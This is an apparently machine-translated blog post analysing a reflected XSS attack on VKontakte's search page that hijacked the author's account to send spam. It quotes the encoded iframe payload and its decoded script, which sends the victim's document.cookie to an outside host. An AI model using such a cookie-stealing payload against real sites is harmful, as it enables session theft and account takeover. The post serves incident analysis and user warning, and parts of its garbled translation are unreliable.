XSS VKontakte

Background (can not read)

I come home today and see 9 messages in my VKontakte. Because I don’t really like and often visit this resource - this event was strange. In the messages, users wrote that from me VKontakte sent spam. Bad, but oh well, I changed the password and that's it ... Though I thought about it: the old password is 12 character alphanumeric, it’s almost not salvage. The computer is crystal clear and not contagious ... So what's the deal?

Debriefing

I watch the text of the message sent on my behalf:

hello, it's not spam! I am referring to all my friends. Today, I will remove my page and I will be able to turn my words to the page . , I am under my own surname and name.wot so.

And here I understand that my natural curiosity has let me down this time too. Yesterday, a similar message came to me, and of course, sitting on the opera, feeling safe and secure, I followed this link. Now go to this page ( from an unlocked browser! ), And look at the code. What do we see? A hidden floating frame is loaded in the code:

  <iframe src = 'http: //%76%6b%6f%6e%74%61%6b%74%65%2e%72%75/gsearch.php? q =% 27; () ()) // \% 27; document.write (String.fromCharCode (60,115,99,114,105,112, there were still many digits separated by commas that stretched the page and for that the UFO took them. If anyone really needs them - in a personal)) //% 22;% 3C% 3E% 22) // \% 22;% 3C% 3E% 22% 3C% 3E% 22% 22! ---% 22?% 3E # c [q] =% 27% 3B () ()) % 20% 20 \ & c [section] = people 'style =' display: none; '> </ iframe> 

The link leads to the “lencode” for “vkontakte.ru”, to the script that performs the search. As you know, after the search procedure, the text of the request is displayed back to the user, this (as well as the lack of proper filtering) and the spammers used in this case.
The JavaScript code is embedded in the query string, in this case, it is the code of another frame encoded into ASCII:

  <script> document.write ('<iframe src = "http://webzer.vov.ru/s.php?dc='+document.cookie+'" style = "display: none;"> </ iframe> ' ); </ script> 

This is actually a sniffer, to which some interesting users like me fly to vkontakte.
Vulnerability is relevant at the time of writing, a simple alert (tested under the opera) demonstrates this . In IE, it does not work, because there is no support for the "data:" protocol, and I am not an expert in writing exploits.

Some conclusions

• Do not walk on the left links.
• A secure browser does not guarantee anything (in this case, it is an XSS vulnerability on the “largest website of the runet”), but vigilance puts an

UPD: The alert example stopped working after 3.5 hours after publication. For those who did not have time to see a screenshot preserved.